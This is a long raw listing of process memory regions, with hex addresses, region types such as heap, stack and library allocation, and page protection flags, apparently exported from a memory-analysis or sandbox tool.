heap
page read and write
5121000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAB23000
heap
page read and write
11D0000
unkown
page read and write
1340000
unkown
page read and write
1FF0001F000
trusted library allocation
page read and write
7FF5D7764000
unkown
page readonly
22CBCB7B000
heap
page read and write
33A0000
heap
page read and write
7637000
unkown
page read and write
24ABA894000
heap
page read and write
22CBCB7B000
heap
page read and write
594D000
unkown
page read and write
5121000
heap
page read and write
C8BC000
unkown
page read and write
8B70000
unkown
page read and write
5AF8000
heap
page read and write
ED0000
trusted library allocation
page read and write
1FD000
stack
page read and write
11C0000
unkown
page read and write
24AB8930000
heap
page read and write
5121000
heap
page read and write
1110000
unkown
page read and write
4DE0000
direct allocation
page read and write
5121000
heap
page read and write
7D9000
system
page execute and read and write
8B70000
unkown
page read and write
3530000
unkown
page read and write
2F42000
heap
page read and write
5121000
heap
page read and write
9A76000
unkown
page read and write
24ABAB0B000
heap
page read and write
5121000
heap
page read and write
1FF00001000
trusted library allocation
page read and write
5AF8000
heap
page read and write
3124000
heap
page read and write
27CF000
stack
page read and write
AA0000
trusted library allocation
page read and write
5121000
heap
page read and write
7FF5D7309000
unkown
page readonly
46F0000
trusted library allocation
page execute and read and write
24ABA877000
heap
page read and write
5B4000
unkown
page readonly
539C000
stack
page read and write
4F10000
trusted library allocation
page read and write
8980000
unkown
page read and write
48E8000
heap
page read and write
8B70000
unkown
page read and write
91C3000
trusted library allocation
page read and write
22CBCB5B000
heap
page read and write
24ABAAE3000
heap
page read and write
1190000
unkown
page read and write
7BD0000
trusted library allocation
page execute and read and write
2B44000
heap
page read and write
9A94000
unkown
page read and write
24ABAAF3000
heap
page read and write
3C20000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB2B000
heap
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAADB000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
20E76570000
heap
page read and write
1230000
trusted library allocation
page read and write
11C0000
unkown
page read and write
24ABAADB000
heap
page read and write
24ABAAE3000
heap
page read and write
26CA000
heap
page read and write
5121000
heap
page read and write
7FF5D769E000
unkown
page readonly
24ABAACB000
heap
page read and write
22CBCB73000
heap
page read and write
22CBCB63000
heap
page read and write
24ABAAE3000
heap
page read and write
55F5000
heap
page read and write
24ABAA64000
heap
page read and write
32A1000
heap
page read and write
5644000
heap
page read and write
80F000
stack
page read and write
22CBCB7B000
heap
page read and write
46C0000
heap
page read and write
7FF5D7438000
unkown
page readonly
4DE9000
heap
page read and write
24ABAA3B000
heap
page read and write
D0F000
stack
page read and write
22CBCB93000
heap
page read and write
26C0000
heap
page read and write
24ABA240000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
33AC000
heap
page read and write
5E59000
heap
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAB0B000
heap
page read and write
7FF5D75F9000
unkown
page readonly
5121000
heap
page read and write
5681000
heap
page read and write
656000
unkown
page write copy
24ABAAE3000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCBA3000
heap
page read and write
24ABAA94000
heap
page read and write
24ABAB13000
heap
page read and write
24ABA888000
heap
page read and write
22CBCB4B000
heap
page read and write
5681000
heap
page read and write
24ABAADB000
heap
page read and write
91A6000
trusted library allocation
page read and write
7DF4F2481000
unkown
page execute read
59CF000
stack
page read and write
5561000
heap
page read and write
3000000
unkown
page read and write
24ABAAC3000
heap
page read and write
A00000
heap
page read and write
24ABAADB000
heap
page read and write
7FF5D72BF000
unkown
page readonly
1190000
unkown
page read and write
2B44000
heap
page read and write
22CBCB4B000
heap
page read and write
11D0000
unkown
page read and write
35B6000
heap
page read and write
22CBCBEB000
heap
page read and write
D2B000
heap
page read and write
3074000
heap
page read and write
22CBCB7B000
heap
page read and write
33A0000
heap
page read and write
20E765BB000
heap
page read and write
32B6000
heap
page read and write
7FF5D75C1000
unkown
page readonly
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
33AC000
heap
page read and write
2B44000
heap
page read and write
8F10000
unkown
page read and write
24ABAAFB000
heap
page read and write
2B44000
heap
page read and write
3900000
heap
page read and write
8F10000
unkown
page read and write
7D6000
system
page execute and read and write
5681000
heap
page read and write
24ABAADB000
heap
page read and write
7FF5CE343000
unkown
page readonly
5121000
heap
page read and write
5121000
heap
page read and write
24ABAAF3000
heap
page read and write
24ABAA46000
heap
page read and write
A416000
unkown
page read and write
24ABAADB000
heap
page read and write
22CBCBA3000
heap
page read and write
24ABAAC3000
heap
page read and write
4AD0000
trusted library allocation
page read and write
510000
unclassified section
page read and write
11A0000
unkown
page read and write
5E73000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB4B000
heap
page read and write
99B0000
unkown
page read and write
445000
unkown
page readonly
24ABAAE3000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
1100000
unkown
page read and write
26C6000
heap
page read and write
15C7000
heap
page read and write
5681000
heap
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
A3B000
stack
page read and write
8270000
trusted library allocation
page read and write
24ABAB13000
heap
page read and write
49FA000
unkown
page read and write
22CBCB63000
heap
page read and write
22CBCBC3000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
7FF5D7546000
unkown
page readonly
2B44000
heap
page read and write
2B44000
heap
page read and write
1621000
heap
page read and write
5681000
heap
page read and write
22CBCC0B000
heap
page read and write
5E59000
heap
page read and write
22CBCB5B000
heap
page read and write
8B70000
unkown
page read and write
24ABA7FE000
heap
page read and write
22CBC664000
heap
page read and write
24ABAAFF000
heap
page read and write
24ABAAFB000
heap
page read and write
7030000
trusted library allocation
page read and write
5681000
heap
page read and write
91F0000
unkown
page readonly
5121000
heap
page read and write
7FF5D71C8000
unkown
page readonly
5121000
heap
page read and write
7640000
heap
page execute and read and write
24ABAA56000
heap
page read and write
5AF8000
heap
page read and write
4DE5000
heap
page read and write
22CBCBC3000
heap
page read and write
8B70000
unkown
page read and write
24ABAADB000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABA7CB000
heap
page read and write
24ABAD6C000
heap
page read and write
24ABA7DC000
heap
page read and write
5121000
heap
page read and write
22CBCB93000
heap
page read and write
8CC0000
unkown
page read and write
2B44000
heap
page read and write
768E000
stack
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
7FF5D71F9000
unkown
page readonly
35ED000
heap
page read and write
11C0000
unkown
page read and write
1110000
unkown
page read and write
24ABAA72000
heap
page read and write
24ABAAE3000
heap
page read and write
5681000
heap
page read and write
22CBC715000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
30D0000
trusted library allocation
page read and write
5121000
heap
page read and write
30A1000
system
page execute and read and write
307C000
stack
page read and write
22CBCB7B000
heap
page read and write
C4DC000
unkown
page read and write
5121000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAA4B000
heap
page read and write
24ABAA88000
heap
page read and write
33AC000
heap
page read and write
22CBCB43000
heap
page read and write
31E3000
heap
page read and write
24ABAAC3000
heap
page read and write
5121000
heap
page read and write
24ABAA53000
heap
page read and write
A2B5000
unkown
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAA6C000
heap
page read and write
110000
heap
page read and write
11A0000
unkown
page read and write
24ABA7CF000
heap
page read and write
413F000
stack
page read and write
5A61000
heap
page read and write
9C000
stack
page read and write
1110000
unkown
page read and write
B10000
heap
page read and write
24ABAADB000
heap
page read and write
32A0000
heap
page read and write
24ABAB0B000
heap
page read and write
5681000
heap
page read and write
5681000
heap
page read and write
22CBCB73000
heap
page read and write
B0BD000
stack
page read and write
24ABAAE3000
heap
page read and write
5681000
heap
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
1100000
unkown
page read and write
1FF00018000
trusted library allocation
page read and write
24ABAAFB000
heap
page read and write
22CBA9BB000
heap
page read and write
4DE4000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
24ABAAB3000
heap
page read and write
24ABA7DD000
heap
page read and write
B8DB000
stack
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
27DF000
stack
page read and write
3000000
unkown
page read and write
22CBCB4B000
heap
page read and write
24ABAB2B000
heap
page read and write
24ABAAAB000
heap
page read and write
22CBCB43000
heap
page read and write
AA0000
trusted library allocation
page read and write
B561000
unkown
page read and write
22CBCB93000
heap
page read and write
24ABAAFB000
heap
page read and write
5121000
heap
page read and write
24ABA884000
heap
page read and write
9AF9000
unkown
page read and write
9B2C000
unkown
page read and write
AA0000
trusted library allocation
page read and write
C7BE000
unkown
page read and write
33AC000
heap
page read and write
9A6A000
unkown
page read and write
1230000
trusted library allocation
page read and write
7FF5D7360000
unkown
page readonly
5121000
heap
page read and write
1FF72C60000
trusted library section
page read and write
2B44000
heap
page read and write
24ABAADB000
heap
page read and write
33AC000
heap
page read and write
5910000
heap
page read and write
24ABAACB000
heap
page read and write
8B70000
unkown
page read and write
22CBCB43000
heap
page read and write
8B70000
unkown
page read and write
2A50000
trusted library allocation
page read and write
1100000
unkown
page read and write
8B70000
unkown
page read and write
3520000
unkown
page readonly
7FF5D74F2000
unkown
page readonly
22CBCB43000
heap
page read and write
1100000
unkown
page read and write
22CBCB43000
heap
page read and write
362A000
unkown
page read and write
91C7000
trusted library allocation
page read and write
4AEA000
unkown
page read and write
22CBCB5B000
heap
page read and write
3070000
heap
page read and write
830E000
stack
page read and write
24ABAA88000
heap
page read and write
4AD0000
trusted library allocation
page read and write
5121000
heap
page read and write
24ABAAC1000
heap
page read and write
32BB000
heap
page read and write
7FF5D77C2000
unkown
page readonly
5D0000
heap
page read and write
11C0000
unkown
page read and write
5121000
heap
page read and write
3000000
unkown
page read and write
22CBCB8B000
heap
page read and write
5E80000
heap
page read and write
51B2000
unkown
page read and write
7FF5D7236000
unkown
page readonly
F0C000
heap
page read and write
35D3000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABA31E000
heap
page read and write
22CBCB78000
heap
page read and write
7FF5D706E000
unkown
page readonly
32BF000
heap
page read and write
8E56000
unkown
page read and write
24ABAAC3000
heap
page read and write
8B70000
unkown
page read and write
489000
unkown
page readonly
24ABA89B000
heap
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
325E000
stack
page read and write
5681000
heap
page read and write
55BF000
stack
page read and write
24ABAB43000
heap
page read and write
5121000
heap
page read and write
4DE0000
heap
page read and write
3510000
trusted library allocation
page read and write
5482000
unkown
page read and write
5121000
heap
page read and write
3D60000
heap
page read and write
5121000
heap
page read and write
35BF000
heap
page read and write
4CE1000
heap
page read and write
35ED000
heap
page read and write
8B70000
unkown
page read and write
24ABAA69000
heap
page read and write
24ABA871000
heap
page read and write
24ABAAE3000
heap
page read and write
7E60000
unkown
page read and write
24ABAACB000
heap
page read and write
8B70000
unkown
page read and write
22CBCBAB000
heap
page read and write
22CBCB5B000
heap
page read and write
30FE000
stack
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
5602000
heap
page read and write
24ABAAFB000
heap
page read and write
3510000
trusted library allocation
page read and write
5681000
heap
page read and write
7FF5D7799000
unkown
page readonly
3055000
trusted library allocation
page execute and read and write
86D0000
trusted library allocation
page read and write
22CBCB43000
heap
page read and write
24ABAAC3000
heap
page read and write
8C39000
stack
page read and write
1230000
trusted library allocation
page read and write
1170000
unkown
page read and write
9191000
trusted library allocation
page read and write
5A40000
heap
page read and write
BEA0000
unkown
page readonly
5CB000
unkown
page readonly
24ABAAE3000
heap
page read and write
D06000
heap
page read and write
22CBCB63000
heap
page read and write
2B44000
heap
page read and write
24AB8950000
unkown
page execute and read and write
2B44000
heap
page read and write
AA0000
trusted library allocation
page read and write
3510000
trusted library allocation
page read and write
5681000
heap
page read and write
22CBCB63000
heap
page read and write
15E9000
heap
page read and write
8980000
unkown
page read and write
33AC000
heap
page read and write
5E75000
heap
page read and write
24ABAADB000
heap
page read and write
24ABAB0B000
heap
page read and write
24ABAAFB000
heap
page read and write
24ABAACB000
heap
page read and write
1190000
unkown
page read and write
24ABAACB000
heap
page read and write
86E0000
trusted library allocation
page execute and read and write
8F49000
stack
page read and write
997C000
stack
page read and write
4E70000
remote allocation
page read and write
1230000
trusted library allocation
page read and write
24ABAADB000
heap
page read and write
22CBCB4B000
heap
page read and write
5680000
heap
page read and write
24ABAB2B000
heap
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
52A0000
unkown
page read and write
24ABAA64000
heap
page read and write
7B80000
unkown
page readonly
5121000
heap
page read and write
24ABAA66000
heap
page read and write
22CBCB4B000
heap
page read and write
5120000
unkown
page read and write
4F10000
trusted library allocation
page read and write
91B0000
trusted library allocation
page read and write
35CB000
heap
page read and write
32CB000
heap
page read and write
5121000
heap
page read and write
24ABAB43000
heap
page read and write
5D35000
heap
page read and write
5121000
heap
page read and write
24ABAB43000
heap
page read and write
75FD000
unkown
page read and write
531F000
stack
page read and write
11C0000
unkown
page read and write
427000
unkown
page execute and read and write
8B70000
unkown
page read and write
22CBCBC3000
heap
page read and write
22CBCB63000
heap
page read and write
6C7E000
stack
page read and write
8B70000
unkown
page read and write
59D0000
direct allocation
page read and write
C460000
unkown
page read and write
5121000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCB4B000
heap
page read and write
35B0000
heap
page read and write
5121000
heap
page read and write
1100000
unkown
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
22CBCB8B000
heap
page read and write
55A5000
heap
page read and write
5681000
heap
page read and write
5681000
heap
page read and write
24ABA874000
heap
page read and write
1FF711F0000
heap
page readonly
5121000
heap
page read and write
5121000
heap
page read and write
3E50000
heap
page read and write
22CBCB63000
heap
page read and write
8B70000
unkown
page read and write
5681000
heap
page read and write
22CBCB63000
heap
page read and write
5121000
heap
page read and write
24ABAA53000
heap
page read and write
11C0000
unkown
page read and write
223F000
heap
page read and write
5C5D000
heap
page read and write
7050000
trusted library allocation
page read and write
22CBCB63000
heap
page read and write
3474000
heap
page read and write
5AF8000
heap
page read and write
4C30000
trusted library allocation
page read and write
3440000
heap
page read and write
24ABAADB000
heap
page read and write
483E000
stack
page read and write
5121000
heap
page read and write
7AE0000
trusted library allocation
page execute and read and write
4A12000
unkown
page read and write
35CB000
heap
page read and write
2D3D000
stack
page read and write
22CBCB5B000
heap
page read and write
1190000
unkown
page read and write
24ABAAE3000
heap
page read and write
86F0000
trusted library allocation
page read and write
1110000
unkown
page read and write
1170000
unkown
page read and write
CA20000
unkown
page read and write
C609000
unkown
page read and write
268F000
heap
page read and write
7BC0000
heap
page read and write
24ABAB2B000
heap
page read and write
AA0000
trusted library allocation
page read and write
2B44000
heap
page read and write
1611000
heap
page read and write
4D70000
trusted library allocation
page read and write
11A0000
unkown
page read and write
2B30000
unkown
page execute and read and write
1230000
unkown
page read and write
24ABA320000
direct allocation
page read and write
22CBCB5B000
heap
page read and write
5AF8000
heap
page read and write
3570000
heap
page read and write
5AF8000
heap
page read and write
2B44000
heap
page read and write
3000000
unkown
page read and write
C24E000
stack
page read and write
24ABA7A2000
heap
page read and write
4700000
trusted library allocation
page read and write
5681000
heap
page read and write
A9DF000
unkown
page read and write
5E59000
heap
page read and write
94CD000
trusted library allocation
page read and write
22CBCB43000
heap
page read and write
22CBCB73000
heap
page read and write
5121000
heap
page read and write
24ABAAE3000
heap
page read and write
22CBCB4B000
heap
page read and write
6D82000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
3DF5000
heap
page read and write
84D0000
heap
page read and write
26DA000
heap
page read and write
24ABAAC3000
heap
page read and write
400000
unkown
page readonly
8F10000
unkown
page read and write
8980000
unkown
page read and write
8B70000
unkown
page read and write
22CBCB5B000
heap
page read and write
22CBCBAB000
heap
page read and write
5121000
heap
page read and write
3E62000
unkown
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
7DC0000
unkown
page readonly
1FF7126D000
heap
page read and write
4C40000
heap
page read and write
24ABA897000
heap
page read and write
AA0000
trusted library allocation
page read and write
EF17FFD000
stack
page read and write
1190000
unkown
page read and write
24ABA899000
heap
page read and write
24ABAAF3000
heap
page read and write
1170000
unkown
page read and write
22CBCB93000
heap
page read and write
51BE000
heap
page read and write
33AC000
heap
page read and write
843F000
stack
page read and write
47DE000
stack
page read and write
24ABA884000
heap
page read and write
7FF848E29000
trusted library allocation
page read and write
22CBCB5B000
heap
page read and write
8B70000
unkown
page read and write
9A92000
unkown
page read and write
76CF000
stack
page read and write
B4B0000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
5121000
heap
page read and write
8F10000
unkown
page read and write
2B44000
heap
page read and write
9193000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
33AC000
heap
page read and write
22CBCB4B000
heap
page read and write
704E000
stack
page read and write
24ABA7FE000
heap
page read and write
5121000
heap
page read and write
4DE6000
heap
page read and write
1FF71502000
heap
page read and write
22CBCB73000
heap
page read and write
7FF848E22000
trusted library allocation
page read and write
3DBE000
stack
page read and write
24ABAA69000
heap
page read and write
33AC000
heap
page read and write
67FC000
trusted library allocation
page read and write
6DD7000
heap
page read and write
49A8000
unkown
page read and write
24ABAADB000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
AA0000
trusted library allocation
page read and write
24ABAA46000
heap
page read and write
5121000
heap
page read and write
24ABAACB000
heap
page read and write
1FF71283000
heap
page read and write
5521000
unkown
page read and write
9A8C000
unkown
page read and write
24ABAA39000
heap
page read and write
5AF8000
heap
page read and write
22CBCB63000
heap
page read and write
4DEE000
heap
page read and write
724D000
stack
page read and write
1190000
unkown
page read and write
24ABAACB000
heap
page read and write
24ABA884000
heap
page read and write
2B44000
heap
page read and write
7FF5D751F000
unkown
page readonly
1170000
unkown
page read and write
2B44000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
4F60000
heap
page read and write
24ABA871000
heap
page read and write
4ADA000
unkown
page read and write
8980000
unkown
page read and write
5E7C000
heap
page read and write
5121000
heap
page read and write
89FC000
stack
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
5AF8000
heap
page read and write
24ABAAC3000
heap
page read and write
8980000
unkown
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
3013000
trusted library allocation
page execute and read and write
8980000
unkown
page read and write
11A0000
unkown
page read and write
22CBCB73000
heap
page read and write
1190000
unkown
page read and write
F574000
unkown
page read and write
8B70000
unkown
page read and write
24ABAAFB000
heap
page read and write
25C0000
trusted library allocation
page read and write
32C0000
heap
page read and write
22CBCB63000
heap
page read and write
6D50000
heap
page read and write
5681000
heap
page read and write
22CBCB7B000
heap
page read and write
35C1000
unkown
page read and write
2B44000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
25C0000
trusted library allocation
page read and write
13A0000
unkown
page readonly
AFC1000
trusted library allocation
page read and write
A3AC000
unkown
page read and write
22CBCB4B000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAAFB000
heap
page read and write
4CE1000
heap
page read and write
91B9000
trusted library allocation
page read and write
7DF4F24A1000
unkown
page execute read
140000
heap
page read and write
1100000
unkown
page read and write
5121000
heap
page read and write
11A0000
unkown
page read and write
114A000
unkown
page read and write
5121000
heap
page read and write
22CBCB8B000
heap
page read and write
5AF8000
heap
page read and write
24ABA897000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5DF6000
trusted library allocation
page read and write
7FF5D7215000
unkown
page readonly
F5B4000
unkown
page read and write
35E4000
unkown
page read and write
24ABAAE3000
heap
page read and write
33AC000
heap
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
4C51000
trusted library allocation
page read and write
ED0000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
22CBCB4B000
heap
page read and write
4B5000
heap
page read and write
24ABA897000
heap
page read and write
22CBCB43000
heap
page read and write
2B45000
heap
page read and write
5AF8000
heap
page read and write
5681000
heap
page read and write
A286000
unkown
page read and write
2D58000
heap
page read and write
3500000
stack
page read and write
5121000
heap
page read and write
6F4E000
stack
page read and write
A9A0000
unkown
page read and write
22CBCBBB000
heap
page read and write
5121000
heap
page read and write
5AF8000
heap
page read and write
5121000
heap
page read and write
22CBCBEB000
heap
page read and write
22CBCB63000
heap
page read and write
7FF5D744E000
unkown
page readonly
1FF712C3000
heap
page read and write
32E3000
heap
page read and write
25C0000
trusted library allocation
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
22CBCB93000
heap
page read and write
BE90000
unkown
page read and write
20E7658B000
heap
page read and write
2110000
heap
page read and write
24ABAAC3000
heap
page read and write
18E000
stack
page read and write
4CE1000
heap
page read and write
5681000
heap
page read and write
22CBCB7B000
heap
page read and write
7FF5D749B000
unkown
page readonly
8B70000
unkown
page read and write
5121000
heap
page read and write
24ABAB2B000
heap
page read and write
5121000
heap
page read and write
7FF5D75B8000
unkown
page readonly
24ABAADB000
heap
page read and write
1110000
unkown
page read and write
3510000
trusted library allocation
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
35C4000
heap
page read and write
5730000
unkown
page read and write
2B44000
heap
page read and write
2F80000
unkown
page read and write
24ABA7F5000
heap
page read and write
11C0000
unkown
page read and write
24ABAAFB000
heap
page read and write
3510000
trusted library allocation
page read and write
C615000
unkown
page read and write
4A0E000
unkown
page read and write
1190000
unkown
page read and write
4F10000
trusted library allocation
page read and write
114A000
unkown
page read and write
24ABAB13000
heap
page read and write
24ABAACB000
heap
page read and write
22CBC62E000
heap
page read and write
22CBCB63000
heap
page read and write
5857000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
24ABAB3B000
heap
page read and write
24ABAACB000
heap
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
5E7C000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
22CBCB43000
heap
page read and write
24ABAACB000
heap
page read and write
BA0000
trusted library allocation
page read and write
32B5000
heap
page read and write
24ABAADB000
heap
page read and write
5AF8000
heap
page read and write
4F10000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
33AC000
heap
page read and write
5865000
heap
page read and write
24ABA85E000
heap
page read and write
3B00000
unkown
page read and write
30D0000
trusted library allocation
page read and write
A446BFE000
stack
page read and write
4D70000
trusted library allocation
page read and write
24ABA897000
heap
page read and write
7440000
unkown
page read and write
24ABAAE3000
heap
page read and write
35B3000
unkown
page read and write
9A80000
unkown
page read and write
7FF5D6BEF000
unkown
page readonly
24ABA7FA000
heap
page read and write
22CBCB7B000
heap
page read and write
24ABAB83000
heap
page read and write
22CBCB7B000
heap
page read and write
BE49000
stack
page read and write
22CBCB43000
heap
page read and write
11C0000
unkown
page read and write
24ABAB0B000
heap
page read and write
50A1000
heap
page read and write
1100000
unkown
page read and write
20E765A0000
heap
page read and write
1170000
unkown
page read and write
22CBCB43000
heap
page read and write
22CBCB8B000
heap
page read and write
22CBCB5B000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
1190000
unkown
page read and write
2B44000
heap
page read and write
24ABA7E3000
heap
page read and write
8B70000
unkown
page read and write
8B70000
unkown
page read and write
22CBCB63000
heap
page read and write
24ABAB0B000
heap
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
ED0000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
22CBCBBB000
heap
page read and write
24ABA89E000
heap
page read and write
4AD1000
heap
page read and write
24ABA7E8000
heap
page read and write
A4472FF000
stack
page read and write
24ABAAE3000
heap
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
A40000
heap
page read and write
401000
unkown
page execute read
A8C000
heap
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
11C0000
unkown
page read and write
35B2000
heap
page read and write
22CBA9B7000
heap
page read and write
22CBCBA3000
heap
page read and write
5681000
heap
page read and write
8B70000
unkown
page read and write
24ABAADB000
heap
page read and write
9187000
trusted library allocation
page read and write
2B44000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
3D50000
heap
page read and write
5681000
heap
page read and write
ED0000
trusted library allocation
page read and write
4790000
heap
page read and write
5121000
heap
page read and write
4582000
trusted library allocation
page read and write
5121000
heap
page read and write
22CBCBAB000
heap
page read and write
24ABAB0B000
heap
page read and write
5121000
heap
page read and write
467A000
heap
page read and write
35B6000
heap
page read and write
24ABA7E3000
heap
page read and write
C035000
stack
page read and write
5121000
heap
page read and write
28BE000
stack
page read and write
8F10000
unkown
page read and write
5121000
heap
page read and write
1230000
trusted library allocation
page read and write
917A000
trusted library allocation
page read and write
24ABAAC3000
heap
page read and write
24ABA897000
heap
page read and write
5C5D000
heap
page read and write
5121000
heap
page read and write
3456000
heap
page read and write
1190000
unkown
page read and write
C496000
unkown
page read and write
5121000
heap
page read and write
4980000
unkown
page read and write
AA0000
trusted library allocation
page read and write
2F9E000
stack
page read and write
22CBCB8B000
heap
page read and write
2111000
heap
page read and write
94E000
stack
page read and write
22CBCB8B000
heap
page read and write
35B1000
heap
page read and write
22CBCB73000
heap
page read and write
D4D000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAADB000
heap
page read and write
8B70000
unkown
page read and write
30BF000
stack
page read and write
1190000
unkown
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
24ABAB2B000
heap
page read and write
8F10000
unkown
page read and write
7FF5D774A000
unkown
page readonly
7790000
trusted library allocation
page read and write
9198000
trusted library allocation
page read and write
9AA0000
unkown
page read and write
5121000
heap
page read and write
A4468F4000
stack
page read and write
2B44000
heap
page read and write
24ABAACB000
heap
page read and write
ED0000
trusted library allocation
page read and write
4FA000
heap
page read and write
24ABAA71000
heap
page read and write
2B44000
heap
page read and write
8F10000
unkown
page read and write
570000
heap
page read and write
24ABAA7E000
heap
page read and write
24ABAACB000
heap
page read and write
22CBCB7B000
heap
page read and write
8B70000
unkown
page read and write
431000
unkown
page read and write
CE8000
heap
page read and write
D4B000
heap
page read and write
8B70000
unkown
page read and write
ED0000
trusted library allocation
page read and write
5121000
heap
page read and write
8B70000
unkown
page read and write
5121000
heap
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
1230000
trusted library allocation
page read and write
5121000
heap
page read and write
22CBCB7B000
heap
page read and write
3510000
trusted library allocation
page read and write
2CA0000
heap
page read and write
24ABAA4B000
heap
page read and write
C61D000
unkown
page read and write
24ABAAC3000
heap
page read and write
3B92000
unkown
page read and write
24ABA7E3000
heap
page read and write
1230000
trusted library allocation
page read and write
7FF5D7694000
unkown
page readonly
5121000
heap
page read and write
50A1000
heap
page read and write
1FF71264000
heap
page read and write
2B44000
heap
page read and write
24ABAAE3000
heap
page read and write
24ABAAC3000
heap
page read and write
5E9F000
stack
page read and write
50A1000
heap
page read and write
C4BD000
unkown
page read and write
35C9000
unkown
page read and write
1190000
unkown
page read and write
1220000
unkown
page read and write
9494000
trusted library allocation
page read and write
2B44000
heap
page read and write
5121000
heap
page read and write
22CBCB63000
heap
page read and write
32B3000
heap
page read and write
3E76000
unkown
page read and write
49FD000
unkown
page read and write
2B45000
heap
page read and write
2342FFF000
unkown
page read and write
7FF5D7784000
unkown
page readonly
1619000
heap
page read and write
5121000
heap
page read and write
20E765BA000
heap
page read and write
22CBCB43000
heap
page read and write
2B44000
heap
page read and write
24ABAB43000
heap
page read and write
ED0000
trusted library allocation
page read and write
22CBCB43000
heap
page read and write
24ABAACB000
heap
page read and write
24ABAACB000
heap
page read and write
5121000
heap
page read and write
24ABAB13000
heap
page read and write
4585000
trusted library allocation
page execute and read and write
24ABAAE3000
heap
page read and write
22CBCB5B000
heap
page read and write
1230000
trusted library allocation
page read and write
22CBCB4B000
heap
page read and write
11A0000
unkown
page read and write
7FF5D7792000
unkown
page readonly
4D70000
trusted library allocation
page read and write
5121000
heap
page read and write
5681000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
5121000
heap
page read and write
A63000
heap
page read and write
EF182FE000
stack
page read and write
8B70000
unkown
page read and write
287F000
stack
page read and write
1150000
unkown
page read and write
8B70000
unkown
page read and write
24ABAB13000
heap
page read and write
24ABA7CF000
heap
page read and write
5121000
heap
page read and write
32B5000
heap
page read and write
22CBCB4B000
heap
page read and write
8B70000
unkown
page read and write
24ABAAA6000
heap
page read and write
22CBCBDB000
heap
page read and write
24ABA7CF000
heap
page read and write
3476000
heap
page read and write
C78A000
unkown
page read and write
11C0000
unkown
page read and write
55FD000
heap
page read and write
22CBCB43000
heap
page read and write
D27000
heap
page read and write
22CBCB63000
heap
page read and write
A39F000
unkown
page read and write
9AB4000
unkown
page read and write
7FF5D7682000
unkown
page readonly
5121000
heap
page read and write
24ABA873000
heap
page read and write
5121000
heap
page read and write
22CBCBC3000
heap
page read and write
2B44000
heap
page read and write
1110000
unkown
page read and write
27D4000
heap
page read and write
4B0000
heap
page read and write
24ABA7CF000
heap
page read and write
8B70000
unkown
page read and write
1100000
unkown
page read and write
91C9000
trusted library allocation
page read and write
24ABAAE3000
heap
page read and write
35B9000
heap
page read and write
45F0000
heap
page read and write
8B70000
unkown
page read and write
2B44000
heap
page read and write
24ABAA7E000
heap
page read and write
11D0000
unkown
page read and write
24ABAA72000
heap
page read and write
24ABAADB000
heap
page read and write
22CBCB43000
heap
page read and write
24ABA7FE000
heap
page read and write
24ABA7CF000
heap
